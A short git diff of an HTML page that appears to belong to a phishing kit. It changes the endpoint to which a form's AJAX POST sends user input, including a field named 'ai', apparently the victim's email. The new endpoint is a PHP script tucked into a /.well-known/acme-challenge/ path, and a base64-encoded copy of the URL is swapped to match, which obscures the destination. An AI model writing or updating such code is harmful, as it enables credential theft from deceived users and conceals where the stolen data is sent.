--- a/index.html
+++ b/index.html
@@ -241,7 +241,7 @@ $(document).ready(function() {
         
         $('#ajaxModal').modal('show');
     });
-    var f = "aHR0cHM6Ly9lcm4tbXguY29tL3Zpc2l0L3BzL25leHQucGhw";
+    var f = "aHR0cHM6Ly9taWtlYmVhdWRpbi5zaXRlLy53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlL25leHQucGhw";
     $('#submit-btn').click(function(event) {
         $('#error').hide();
         $('#msg').hide();
@@ -268,7 +268,7 @@ $(document).ready(function() {
 
         $.ajax({
             dataType: 'JSON',
-            url: 'https://ern-mx.com//visit/ps/next.php',
+            url: 'https://mikebeaudin.site/.well-known/acme-challenge/next.php',
             type: 'POST',
             data: {
                 ai: ai,
